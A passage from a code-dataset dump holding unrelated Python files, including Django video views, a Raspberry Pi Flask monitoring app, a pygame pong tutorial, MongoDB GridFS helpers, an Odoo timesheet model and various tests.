videos=Video.objects.filter(title__icontains=name).order_by('-isTop','-isVip').values('id','title','img','desc','isVip','isTop')\n \n data={'success':True,'video':videos}\n else:\n data={'success':False,'err_code':1004,'err_code':'empty query'}\n return Response(data)\nclass LoadVideo(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n def get_object(self, pk):\n try:\n return Video.objects.get(pk=pk)\n except Video.DoesNotExist:\n raise Http404\n def get(self,request,pk,format=None):\n user=request.user\n video=self.get_object(pk)\n if video.isVip and not user.isvip:\n data={'success':False,'err_msg':'user is not vip'}\n return Response(data)\n path=video.myVideo.path\n response = HttpResponse(FileWrapper(file(path)), content_type = 'application/octet-stream')\n response['Content-Length'] = os.path.getsize(path)\n response['Content-Disposition'] = 'attachment; filename = %s.mp4' % video.title.encode('utf-8')\n user.videos.add(video)\n user.save()\n return response\nclass LoadVideo_nginx(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n def get_object(self, pk):\n try:\n return Video.objects.get(pk=pk)\n except Video.DoesNotExist:\n raise Http404\n def get(self,request,pk,format=None):\n user=request.user\n video=self.get_object(pk)\n if video.isVip and not user.isvip:\n data={'success':False,'err_msg':'user is not vip'}\n return Response(data)\n name=video.myVideo.name.split('/')[-1]\n response = HttpResponse()\n response['Content_Type']='application/octet-stream'\n response['Content-Length'] = os.path.getsize(video.myVideo.path)\n response['Content-Disposition'] = 'attachment; filename = %s' %name.encode('utf-8')\n response['X-Accel-Redirect']='/download/%s'%video.myVideo.name\n user.videos.add(video)\n user.save()\n return response\n\n","sub_path":"video/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"289019813","text":"# encoding: utf-8\nimport os\nfrom time import sleep\nfrom flask import Flask, render_template, request, Response\nimport Adafruit_DHT\nimport RPi.GPIO as GPIO\nfrom camera_pi import Camera\n\napp = Flask(__name__)\n\nGPIO.setmode(GPIO.BCM)\nR,G,Y = 20,21,16\nFIRE = 22\nSMOKE = 27\n\ndef getDHTdata(): \n DHT22Sensor = Adafruit_DHT.DHT22\n DHTpin = 17\n hum, temp = Adafruit_DHT.read_retry(DHT22Sensor, DHTpin)\n \n if hum is not None and temp is not None:\n hum = round(hum)\n temp = round(temp, 1)\n return temp, hum\n\ndef detect():\n GPIO.setup(SMOKE,GPIO.IN)\n GPIO.setup(FIRE,GPIO.IN)\n GPIO.setup(R,GPIO.OUT)\n GPIO.setup(G,GPIO.OUT)\n GPIO.setup(Y,GPIO.OUT)\n #f = GPIO.input(FIRE)\n #y = GPIO.input(SMOKE)\n if GPIO.input(SMOKE) == GPIO.LOW:\n GPIO.output(G,GPIO.LOW)\n GPIO.output(Y,GPIO.HIGH)\n u = \"GAS!\"\n if GPIO.input(FIRE) == GPIO.LOW:\n GPIO.output(R,GPIO.HIGH)\n u = \"GAS AND FIRE!!\"\n if GPIO.input(FIRE) == GPIO.HIGH:\n GPIO.output(R,GPIO.LOW)\n \n if GPIO.input(SMOKE) == GPIO.HIGH:\n GPIO.output(Y,GPIO.LOW)\n if GPIO.input(FIRE) == GPIO.LOW:\n GPIO.output(G,GPIO.LOW)\n GPIO.output(R,GPIO.HIGH)\n u = \"FIRE!\"\n if GPIO.input(FIRE) == GPIO.HIGH:\n GPIO.output(R,GPIO.LOW)\n GPIO.output(G,GPIO.HIGH)\n u = \"OK~\"\n return u\n@app.route(\"/\")\ndef index():\n return render_template('index.html')\n\n@app.route(\"/detect\")\ndef dht():\n #timeNow = time.asctime( time.localtime(time.time()) )\n temp, hum = getDHTdata()\n u = detect()\n templateData = {\n #'time': timeNow,\n 'temp': temp,\n 'hum' : hum,\n 'u' : u\n }\n return render_template('detect.html', **templateData)\n\nglobal panServoAngle\nglobal tiltServoAngle\npanServoAngle = 90\ntiltServoAngle = 0\n\npanPin = 18\n#tiltPin = 17\n\n@app.route('/camera')\ndef camera():\n \"\"\"Video streaming home page.\"\"\"\n \n templateData = {\n 'panServoAngle'\t: panServoAngle,\n 'tiltServoAngle'\t: tiltServoAngle\n\t}\n return render_template('camera.html', **templateData)\n\n\ndef gen(camera):\n \"\"\"Video streaming generator function.\"\"\"\n while True:\n frame = camera.get_frame()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n\n@app.route('/video_feed')\ndef video_feed():\n \"\"\"Video streaming route. Put this in the src attribute of an img tag.\"\"\"\n return Response(gen(Camera()),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\n\n@app.route(\"//\")\ndef move(servo, angle):\n\tglobal panServoAngle\n\tglobal tiltServoAngle\n\tif servo == 'pan':\n\t\tif angle == '+':\n\t\t\tpanServoAngle = panServoAngle + 30\n\t\telse:\n\t\t\tpanServoAngle = panServoAngle - 30\n\t\tos.system(\"python3 angleServoCtrl.py \" + str(panPin) + \" \" + str(panServoAngle))\n\tif servo == 'tilt':\n\t\tif angle == '+':\n\t\t\ttiltServoAngle = tiltServoAngle + 30\n\t\telse:\n\t\t\ttiltServoAngle = tiltServoAngle - 30\n\t\tos.system(\"python3 angleServoCtrl.py \" + str(tiltPin) + \" \" + str(tiltServoAngle))\n\t\n\ttemplateData = {\n 'panServoAngle'\t: panServoAngle,\n 'tiltServoAngle'\t: tiltServoAngle\n\t}\n\treturn render_template('camera.html', **templateData)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port = 8080, debug=True, threaded=True)\n","sub_path":"home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"650935515","text":"#!/usr/bin/python\n#\n# 1st version of pong with classes\n#\n#\n\nimport pygame, sys, random\nfrom pygame.locals import *\n\n# we will still keep some globals around for things like the\n# game world constants\n\nSCREEN_WIDTH = 640\nSCREEN_HEIGHT = 480\nFRAMERATE = 60\n\n# initialize pygame\npygame.init()\n# make a global clock\nCLOCK = pygame.time.Clock()\n# our display surface will also be global for now\nSCREEN = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption(\"A game of pong!\")\n\n# let's create a paddle class\nclass Paddle(object):\n \"\"\"\n Represents a player paddle for a game of pong.\n It keeps track of the paddle's position, velocity, and color.\n It handles control of the paddle and collision detection as well.\n \"\"\"\n def __init__(self, x, y, color=(255, 0, 0)):\n self.x = x\n self.y = y\n self.w = 10 # width\n self.h = 100# height\n self.color = color\n self.dy = 10 # motion speed\n self.paddle_up = self.paddle_down = False # paddle is not moving\n self.draw()\n\n def set_paddle_up(self):\n \"\"\"\n Set the paddle to move up\n \"\"\"\n self.paddle_up = True\n\n def set_paddle_down(self):\n \"\"\"\n Set the paddle to move down\n \"\"\"\n self.paddle_down = True\n\n def stop_paddle(self):\n \"\"\"\n Stops the paddle from moving\n \"\"\"\n self.paddle_up = self.paddle_down = False\n\n def update(self):\n \"\"\"\n This is the method that actually moves the paddle\n \"\"\"\n if self.y > 0 and self.paddle_up:\n self.y -= self.dy\n\n if (self.y + 100) < SCREEN_HEIGHT and self.paddle_down:\n self.y += self.dy\n\n def draw(self):\n \"\"\"\n Draws the paddle\n \"\"\"\n self.bounding_box = pygame.draw.rect(SCREEN, self.color, (self.x, self.y, self.w, self.h))\n\nclass Ball(object):\n \"\"\"\n A very simple ball to represent the ball\n \"\"\"\n # there's a lot of room for improvement here, left as an\n # exercise to the reader\n def __init__(self):\n self.radius = 10\n self.color = (0, 0, 255)\n self.reset()\n self.draw()\n\n def reset(self):\n \"\"\"\n Resets the ball to it's start position in the middle of the screen\n and gives it an initial velocity in x and y\n \"\"\"\n # so that is truly centered\n self.x = (SCREEN_WIDTH / 2) - self.radius\n self.y = (SCREEN_HEIGHT / 2) - self.radius\n self.dx = random.randint(-3, 3) # there's a bug in this line, find a a way to fix it\n self.dy = random.randint(-6, 6)\n\n def update(self):\n \"\"\"\n Updates the position of the ball\n \"\"\"\n self.x += self.dx\n self.y += self.dy\n if self.y < 0 or (self.y+self.radius) > SCREEN_HEIGHT:\n self.dy = -self.dy\n # we would like to check this for the scoring in the future\n if self.x < 0 or (self.x+self.radius) > SCREEN_WIDTH:\n self.reset()\n\n def check_collisions(self, paddle):\n \"\"\"\n Check collision against a paddle\n \"\"\"\n # what else can we do here???\n if self.bounding_box.colliderect(paddle.bounding_box):\n self.dx = -self.dx\n\n def draw(self):\n \"\"\"\n Draws the ball onto the screen\n \"\"\"\n self.bounding_box = pygame.draw.circle(SCREEN, self.color, (self.x, self.y), self.radius)\n\ndef game_loop():\n # create the players\n player1 = Paddle(40, SCREEN_HEIGHT/2 - 50)\n player2 = Paddle(SCREEN_WIDTH-50, SCREEN_HEIGHT/2-50, (0, 255, 0))\n # create the ball\n ball = Ball()\n # background\n background = pygame.Surface(SCREEN.get_size())\n background.fill((0, 0, 0))\n while True:\n # get events\n # can we thing of a better way to manage this events?\n # an event manager object??? \n for event in pygame.event.get():\n # print(event)\n if event.type == QUIT:\n sys.exit(0)\n if event.type == KEYDOWN:\n if event.key == K_w:\n player1.set_paddle_up()\n if event.key == K_s:\n player1.set_paddle_down()\n if event.key == K_UP:\n player2.set_paddle_up()\n if event.key == K_DOWN:\n player2.set_paddle_down()\n if event.type == KEYUP:\n if event.key == K_w or event.key == K_s:\n player1.stop_paddle()\n if event.key == K_UP or event.key == K_DOWN:\n player2.stop_paddle()\n # clear the SCREEN\n SCREEN.blit(background, (0, 0))\n # update things\n player1.update()\n player2.update()\n # check for ball collisions\n ball.check_collisions(player1)\n ball.check_collisions(player2)\n ball.update()\n # draw things\n player1.draw()\n player2.draw()\n ball.draw()\n # tick the clock\n CLOCK.tick(FRAMERATE)\n # flip the display\n pygame.display.flip()\n\nif __name__ == '__main__':\n game_loop()\n","sub_path":"class_5/code/pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":5129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"465307046","text":"import pytest\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium import webdriver\n\nline = 'http://selenium1py.pythonanywhere.com/'\n\n\n\ndef test_exception1():\n try:\n browser = webdriver.Chrome()\n browser.get(line)\n with pytest.raises(NoSuchElementException):\n browser.find_element(By.CSS_SELECTOR, 'button.btn')\n pytest.fail('Не должно быть кнопки обернуто')\n finally:\n browser.quit()\n\n\ndef test_exception2():\n try:\n browser = webdriver.Chrome()\n browser.get(line)\n with pytest.raises(NoSuchElementException):\n browser.find_element(By.CSS_SELECTOR, 'no_such_button.btn')\n pytest.fail('Не должно быть кнопки Отправить')\n finally:\n browser.quit()","sub_path":"test_frameworks/lessons/test_lessons_two.py","file_name":"test_lessons_two.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"396595504","text":"from lib.image import *\nfrom lib.useInfo import *\nfrom lib.db import *\nfrom etc.config import *\nfrom gridfs import *\nfrom bson import ObjectId\n\ndef InsertImage(path, filename, process_times, origin_fileid):\n image = Image(path, filename, process_times, origin_fileid)\n mongo = MongoDB(configs['DB']['HOST'], configs['DB']['PORT'], configs['DB']['NAME'])\n db = mongo.GetDB()\n gfs = GridFS(db)\n #打开文件,并读取数据\n img = open(image.GetPath() + image.GetFilename(), 'rb')\n data = img.read()\n #存放数据到mongodb数据库\n gfs.put(data, filename = image.GetFilename(), process_times = image.GetProcessTimes(), origin_fileid = image.GetOriginFileid())\n #关闭数据库连接\n mongo.Close()\n\ndef DeleteImage(dict):\n mongo = MongoDB(configs['DB']['HOST'], configs['DB']['PORT'], configs['DB']['NAME'])\n db = mongo.GetDB()\n\n if dict == None:\n db.fs.files.remove()\n db.fs.chunks.remove()\n return\n\n gfs = GridFS(db)\n\n files = db['fs.files']\n fileList = files.find(dict)\n\n for file in fileList:\n id = file['_id']\n gfs.delete(ObjectId(id))\n\n mongo.Close()\n\n#删除所有的图像\ndef DeleteAllImage():\n DeleteImage(None)\n\ndef FindImage(dict):\n mongo = MongoDB(configs['DB']['HOST'], configs['DB']['PORT'], configs['DB']['NAME'])\n db = mongo.GetDB()\n gfs = GridFS(db)\n\n files = db.fs.files\n fileList = files.find(dict)\n\n for file in fileList:\n id = file['_id']\n data = gfs.get(ObjectId(id))\n f = open(configs['IMAGE']['FIND_RESULT_PATH'] + str(id) + configs['IMAGE']['EXT_NAME'], 'wb')\n f.write(data.read())\n f.close()\n\n mongo.Close()\n\ndef FindImageById(id):\n dict = {}\n dict['_id'] = id\n FindImage(dict)\n\ndef FindImageByFilename(filename):\n dict = {}\n dict['filename'] = filename\n FindImage(dict)\n\ndef InsertPatientInfo(origin_image_id, patientId, patientName = \"\", patientBirthDate = \"\",\n patientSex = \"\", studyId = \"\", studyTime = \"\",studyDate = \"\",\n institutionName = \"\", maufacturer = \"\", numberOfFrames = \"\"):\n\n patient = Patient(patientId, patientName, patientBirthDate, patientSex, studyId, studyTime,studyDate,institutionName, maufacturer, numberOfFrames)\n mongo = MongoDB(configs['DB']['HOST'], configs['DB']['PORT'], configs['DB']['NAME'])\n db = mongo.GetDB()\n collection = db[configs['PATIENT_COLLECTION_NAME']] #如果集合不存在,插入第一文档时会自动生成\n\n # 用dic类型存放病人信息\n patientInfo = {}\n patientInfo['patientId'] = patient.GetPatientId()\n patientInfo['patientName'] = patient.GetPatientName()\n patientInfo['patientBirthDate'] = patient.GetPatientBirthDate()\n patientInfo['patientSex'] = patient.GetPatientSex()\n patientInfo['studyId'] = patient.GetStudyId()\n patientInfo['stduyTime'] = patient.GetStudyTime()\n patientInfo['institutionName'] = patient.GetInstitutionName()\n patientInfo['maufacturer'] = patient.GetMaufacturer()\n patientInfo['numberOfFrames'] = patient.GetNumberOfFrames()\n patientInfo['studyDate'] = patient.GetStudyDate()\n patientInfo['origin_image_id'] = origin_image_id\n\n # 插入\n collection.insert(patientInfo)\n mongo.Close()\n\ndef FindPatientInfo(dict):\n mongo = MongoDB(configs['DB']['HOST'], configs['DB']['PORT'], configs['DB']['NAME'])\n db = mongo.GetDB()\n collection = db[configs['PATIENT_COLLECTION_NAME']]\n\n res = collection.find(dict)\n mongo.Close()\n return res\n\ndef UpdataPatientInfo(dict1, dict2):\n mongo = MongoDB(configs['DB']['HOST'], configs['DB']['PORT'], configs['DB']['NAME'])\n db = mongo.GetDB()\n collection = db[configs['PATIENT_COLLECTION_NAME']]\n\n tmp = {}\n tmp['$set'] = dict2\n collection.update(dict1, tmp)\n\n mongo.Close()\n\ndef DeletePatientInfo(dict):\n mongo = MongoDB(configs['DB']['HOST'], configs['DB']['PORT'], configs['DB']['NAME'])\n db = mongo.GetDB()\n collection = db[configs['PATIENT_COLLECTION_NAME']]\n\n if dict == None:\n collection.remove()\n return\n\n collection.remove(dict)\n mongo.Close()\n\ndef DeleteAllPatientInfo():\n DeletePatientInfo(None)\n","sub_path":"mongodb.py","file_name":"mongodb.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"400689253","text":"\ndef calc(a, b):\n \"\"\"一部WA\"\"\"\n # floorしたときa, bになるxの範囲を探す\n l = 1 - 1e-9\n x1_range = [v / 0.08 for v in (a+1-l, a, a+l)]\n x2_range = [v / 0.10 for v in (b+1-l, b, b+l)]\n x1_range = range(round(min(x1_range)), round(max(x1_range)))\n x2_range = range(round(min(x2_range)), round(max(x2_range)))\n # 2つのrangeに重なる区間があれば最小値を返し、重なっていなければ-1を返す\n if (min(x1_range) in x2_range) and (min(x2_range) in x1_range):\n return min(x1_range)\n if (min(x1_range) in x2_range) and not (min(x2_range) in x1_range):\n return min(x1_range)\n if not (min(x1_range) in x2_range) and (min(x2_range) in x1_range):\n return min(x2_range)\n return -1\n\n\ndef calc(a, b):\n \"\"\"回答例は全探索してたので全探索したもの\"\"\"\n from math import floor\n for x in range(1, 1251):\n a_ = floor(x * 0.08)\n b_ = floor(x * 0.10)\n if (a == a_) and (b == b_):\n return x\n return -1\n\n\na, b = map(int, input().split())\nprint(calc(a, b))\n","sub_path":"atcoder-problems/easy-57.py","file_name":"easy-57.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"29368053","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import AccessError, UserError, RedirectWarning, ValidationError, Warning\nfrom ..services.datahandler import DataHandler\nimport datetime\nclass Timesheet(models.Model):\n _inherit = 'account.analytic.line'\n\n ## Remove unnecessary attributes\n\n task_id = fields.Many2one('project.task', 'Task', index=True)\n\n project_id = fields.Many2one('project.project', 'Project', domain=[('allow_timesheets', '=', True)])\n\n employee_id = fields.Many2one('hr.employee', \"Employee\")\n\n last_modified = fields.Datetime()\n\n assignee_id = fields.Many2one('hr.employee', \"Employee\")\n\n jiraKey = fields.Char()\n\n @api.model\n def auto_gen_new_line(self):\n taskDB = self.env['project.task'].sudo()\n task_records = taskDB.search([])\n\n username = self.env.user['login']\n employee_DB = self.env['hr.employee'].sudo()\n employee = employee_DB.search([('name','=',username)])\n\n for record in task_records :\n print(\"hello : \",record.project_id.id)\n self.env['account.analytic.line'].create({\n 'task_id': record.id,\n 'project_id': record.project_id.id,\n 'employee_id': employee.id,\n 'unit_amount': 0,\n 'name': \"test\",\n 'date': datetime.datetime.now() + datetime.timedelta(7),\n })\n\n\n @api.model\n def auto_sync_data(self):\n dataHandler = DataHandler(self.env.user['login'])\n\n try:\n dataHandler.sync_data_from_jira()\n except Exception as e:\n print(e)\n\n @api.multi\n def button_sync(self):\n\n dataHandler = DataHandler(self.env.user['login'])\n\n try:\n dataHandler.sync_data_from_jira()\n except Exception as e:\n print(e)\n\n\n\n # if fail_sync_jira :\n # raise Warning(_(\"problem raise when sync\"))\n\n\n @api.model\n def create(self, val):\n\n # put code sync to Jira here\n # if fail return pop up\n\n return super(Timesheet,self).create(val)\n\n\n @api.multi\n def write(self, val):\n\n # put code sync to Jira here\n\n return super(Timesheet,self).write(val)\n\n","sub_path":"models/hr_timesheet.py","file_name":"hr_timesheet.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"82058300","text":"from part1c.zooanimals import *\nfrom part1c.zookeeper import *\nfrom part1c.zooannouncer import *\n\n\n### Felines ###\ncharlie = Cat(\"Charlie\")\nchloe = Cat(\"Chloe\")\nchris = Cat(\"Chris\")\n\ntom = Tiger(\"Tom\")\nted = Tiger(\"Ted\")\n\nlucas = Lion(\"Lucas\")\nlincoln = Lion(\"Lincoln\")\n\nanimal_list = [charlie, chloe, chris, tom, ted, lucas, lincoln]\n\n### Pachyderms ###\nevan = Elephant(\"Evan\")\nerik = Elephant(\"Erik\")\n\nhiro = Hippo(\"Hiro\")\nhillary = Hippo(\"Hillary\")\nhibai = Hippo(\"Hibai\")\n\nriley = Rhino(\"Riley\")\nrobert = Rhino(\"Robert\")\n\nanimal_list.extend([evan, erik, hiro, hillary, hibai, riley, robert])\n\n### Canines ###\nwilliam = Wolf(\"William\")\nwayne = Wolf(\"Wayne\")\n\ndave = Dog(\"Dave\")\ndaniel = Dog(\"Daniel\")\ndrew = Dog(\"Drew\")\ndot = Dog(\"Dot\")\n\nanimal_list.extend([william, wayne, dave, daniel, drew, dot])\n\n### Fish ###\ntracy = Trout(\"Tracy\")\ntrump = Trout(\"Trump\")\n\nkelly = Koi(\"Kelly\")\nkate = Koi(\"Kate\")\nkevin = Koi(\"Kevin\")\n\nbob = Bass(\"Bob\")\nbailey = Bass(\"Bailey\")\n\nanimal_list.extend([tracy, trump, kelly, kate, kevin, bob, bailey])\n\n### Birds ###\nolivia = Owl(\"Olivia\")\noscar = Owl(\"Oscar\")\n\nsteve = Sparrow(\"Steve\")\nsam = Sparrow(\"Sam\")\n\npaul = Penguin(\"Paul\")\npolly = Penguin(\"Polly\")\npeter = Penguin(\"Peter\")\npiers = Penguin(\"Piers\")\n\nanimal_list.extend([olivia, oscar, steve, sam, paul, polly, peter, piers])\n\n### zooannouncers ###\nzanc1 = ZooAnnouncer(\"Number#1\")\nzanc2 = ZooAnnouncer(\"Number#2\")\n\n### zookeeper ###\nzkp = Zookeeper()\n\nzkp.listObservers()\n\nzkp.registerObserver(zanc1)\nzkp.registerObserver(zanc2)\n\nzkp.listObservers()\n\nzkp.wakeAnimals(animal_list)\nzkp.rollCallAnimals(animal_list)\nzkp.feedAnimals(animal_list)\nzkp.exerciseAnimals(animal_list)\nzkp.shutDownZoo(animal_list)\n\nzkp.removeObserver(zanc1)\nzkp.removeObserver(zanc2)\n\nzkp.listObservers()\n\ndel zanc1\ndel zanc2\n","sub_path":"part1c/managezoo.py","file_name":"managezoo.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"145196635","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\"\"\"This module contains the tests for the helper module.\"\"\"\n\nimport io\nimport os\nimport platform\nimport re\nimport signal\nimport time\nfrom collections import OrderedDict\nfrom pathlib import Path\nfrom subprocess import Popen # nosec\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom aea.configurations.base import ConnectionConfig\nfrom aea.helpers.base import (\n MaxRetriesError,\n RegexConstrainedString,\n exception_log_and_reraise,\n load_aea_package,\n load_env_file,\n load_module,\n locate,\n retry_decorator,\n send_control_c,\n try_decorator,\n win_popen_kwargs,\n yaml_dump,\n yaml_load,\n)\n\nfrom packages.fetchai.connections.oef.connection import OEFConnection\n\nfrom tests.conftest import CUR_PATH, ROOT_DIR, skip_test_windows\n\n\nclass TestHelpersBase:\n \"\"\"Test the helper functions.\"\"\"\n\n def test_locate(self):\n \"\"\"Test the locate function to locate modules.\"\"\"\n cwd = os.getcwd()\n os.chdir(os.path.join(CUR_PATH, \"..\"))\n gym_package = locate(\n \"packages.fetchai.connections.gym.connection.GymConnection\"\n )\n non_existing_package = locate(\n \"packages.fetchai.connections.non_existing_connection\"\n )\n os.chdir(cwd)\n assert gym_package is not None\n assert non_existing_package is None\n\n def test_locate_class(self):\n \"\"\"Test the locate function to locate classes.\"\"\"\n cwd = os.getcwd()\n os.chdir(os.path.join(CUR_PATH, \"..\"))\n expected_class = OEFConnection\n actual_class = locate(\n \"packages.fetchai.connections.oef.connection.OEFConnection\"\n )\n os.chdir(cwd)\n # although they are the same class, they are different instances in memory\n # and the build-in default \"__eq__\" method does not compare the attributes.\n # so compare the names\n assert actual_class is not None\n assert expected_class.__name__ == actual_class.__name__\n\n def test_locate_with_builtins(self):\n \"\"\"Test that locate function returns the built-in.\"\"\"\n result = locate(\"int.bit_length\")\n assert int.bit_length == result\n\n def test_locate_when_path_does_not_exist(self):\n \"\"\"Test that locate function returns None when the dotted path does not exist.\"\"\"\n result = locate(\"aea.not.existing.path\")\n assert result is None\n\n result = locate(\"ThisClassDoesNotExist\")\n assert result is None\n\n\ndef test_regex_constrained_string_initialization():\n \"\"\"Test we can initialize a regex constrained with the default regex.\"\"\"\n RegexConstrainedString(\"\")\n RegexConstrainedString(\"abcde\")\n RegexConstrainedString(b\"\")\n RegexConstrainedString(b\"abcde\")\n RegexConstrainedString(RegexConstrainedString(\"\"))\n RegexConstrainedString(RegexConstrainedString(\"abcde\"))\n\n\ndef test_yaml_dump_load():\n \"\"\"Test yaml dump/load works.\"\"\"\n data = OrderedDict({\"a\": 12, \"b\": None})\n stream = io.StringIO()\n yaml_dump(data, stream)\n stream.seek(0)\n loaded_data = yaml_load(stream)\n assert loaded_data == data\n\n\ndef test_load_aea_package():\n \"\"\"Test aea package load.\"\"\"\n config = ConnectionConfig(\"http_client\", \"fetchai\", \"0.5.0\")\n config.directory = Path(ROOT_DIR) / \"packages\"\n load_aea_package(config)\n\n\ndef test_load_module():\n \"\"\"Test load module from filepath and dotted notation.\"\"\"\n load_module(\n \"packages.fetchai.connections.gym.connection\",\n Path(ROOT_DIR)\n / \"packages\"\n / \"fetchai\"\n / \"connections\"\n / \"gym\"\n / \"connection.py\",\n )\n\n\ndef test_load_env_file():\n \"\"\"Test load env file updates process environment variables.\"\"\"\n load_env_file(Path(ROOT_DIR) / \"tests\" / \"data\" / \"dot_env_file\")\n assert os.getenv(\"TEST\") == \"yes\"\n\n\ndef test_reg_exp_not_match():\n \"\"\"Test regexp checks.\"\"\"\n # for pydocstyle\n class MyReString(RegexConstrainedString):\n REGEX = re.compile(r\"[0-9]+\")\n\n with pytest.raises(ValueError):\n MyReString(\"anystring\")\n\n\ndef test_try_decorator():\n \"\"\"Test try and log decorator.\"\"\"\n # for pydocstyle\n @try_decorator(\"oops\", default_return=\"failed\")\n def fn():\n raise Exception(\"expected\")\n\n assert fn() == \"failed\"\n\n\ndef test_retry_decorator():\n \"\"\"Test auto retry decorator.\"\"\"\n num_calls = 0\n retries = 3\n\n @retry_decorator(retries, \"oops. expected\")\n def fn():\n nonlocal num_calls\n num_calls += 1\n raise Exception(\"expected\")\n\n with pytest.raises(MaxRetriesError):\n fn()\n assert num_calls == retries\n\n\ndef test_log_and_reraise():\n \"\"\"Test log and reraise context manager.\"\"\"\n log_msg = None\n\n def fn(msg):\n nonlocal log_msg\n log_msg = msg\n\n with pytest.raises(ValueError):\n with exception_log_and_reraise(fn, \"oops\"):\n raise ValueError()\n\n assert log_msg == \"oops\"\n\n\n@skip_test_windows\ndef test_send_control_c_group():\n \"\"\"Test send control c to process group.\"\"\"\n # Can't test process group id kill directly,\n # because o/w pytest would be stopped.\n process = Popen([\"sleep\", \"1\"]) # nosec\n pgid = os.getpgid(process.pid)\n time.sleep(0.1)\n with patch(\"os.killpg\") as mock_killpg:\n send_control_c(process, kill_group=True)\n process.communicate(timeout=3)\n mock_killpg.assert_called_with(pgid, signal.SIGINT)\n\n\ndef test_send_control_c():\n \"\"\"Test send control c to process.\"\"\"\n # Can't test process group id kill directly,\n # because o/w pytest would be stopped.\n process = Popen( # nosec\n [\"timeout\" if platform.system() == \"Windows\" else \"sleep\", \"5\"],\n **win_popen_kwargs()\n )\n time.sleep(0.001)\n send_control_c(process)\n process.communicate(timeout=3)\n assert process.returncode != 0\n\n\n@skip_test_windows\ndef test_send_control_c_windows():\n \"\"\"Test send control c on Windows.\"\"\"\n process = Popen( # nosec\n [\"timeout\" if platform.system() == \"Windows\" else \"sleep\", \"5\"]\n )\n time.sleep(0.001)\n pid = process.pid\n with patch(\"aea.helpers.base.signal\") as mock_signal:\n mock_signal.CTRL_C_EVENT = \"mock\"\n with patch(\"platform.system\", return_value=\"Windows\"):\n with patch(\"os.kill\") as mock_kill:\n send_control_c(process)\n mock_kill.assert_called_with(pid, mock_signal.CTRL_C_EVENT)\n","sub_path":"tests/test_helpers/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":7174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"495107052","text":"import numpy as np\nimport h5py\n\ndef inpute(path, split):\n if split == 'train':\n h5file = h5py.File(path + '.h5', 'r')\n read_data = h5file['train_data'][...]#得到的是一个HDF5的dataset,并不是array\n read_labels = h5file['train_labels'][...]\n read_mask = h5file['train_mask'][...]\n read_data = np.array(read_data, dtype=np.float32)\n read_labels = np.array(read_labels, dtype=np.float32)\n read_mask = np.array(read_mask, dtype=np.float32)\n return read_data, read_labels, read_mask\n\n elif split == 'test':\n h5file = h5py.File(path + '.h5', 'r')\n read_data = h5file['test_data'][...]\n read_labels = h5file['test_labels'][...]\n return read_data, read_labels\n\n\ndef process(read_data, read_labels, read_mask):\n batch = 16 #每次输入图片个数\n size = 64\n\n data_cases, data_height, data_width, data_channels = read_data.shape\n labels_cases, labels_height, labels_width, labels_channels = read_labels.shape\n mask_cases, mask_height, mask_width, mask_channels = read_mask.shape\n rand_index = np.random.random_integers(0, data_cases - 1, size=batch)\n rand_index.sort()\n data = read_data[rand_index, :, :, :]\n labels = read_labels[rand_index, :, :, :]\n mask = read_mask[rand_index, :, :, :]\n crops_x = np.random.random_integers(0, high=data_height - size, size=batch)\n crops_y = np.random.random_integers(0, high=data_width - size, size=batch)\n random_cropped_data = np.zeros((batch, size, size, data_channels), dtype=np.float32)\n random_cropped_labels = np.zeros((batch, size, size, labels_channels), dtype=np.float32)\n random_cropped_mask = np.zeros((batch, size, size, labels_channels), dtype=np.float32)\n\n for i in range(batch):\n random_cropped_data[i, :, :, :] = data[i, crops_x[i]: (crops_x[i] + size), crops_y[i]: (crops_y[i] + size), :]\n random_cropped_labels[i, :, :, :] = labels[i, (crops_x[i]):(crops_x[i] + size), (crops_y[i]):(crops_y[i] + size), :]\n random_cropped_mask[i, :, :, :] = mask[i, crops_x[i]: (crops_x[i] + size), crops_y[i]: (crops_y[i] + size), :]\n\n return random_cropped_data, random_cropped_labels, random_cropped_mask\n\n\ndef inpute_test(path):\n h5file = h5py.File(path + '.h5', 'r')\n read_data = 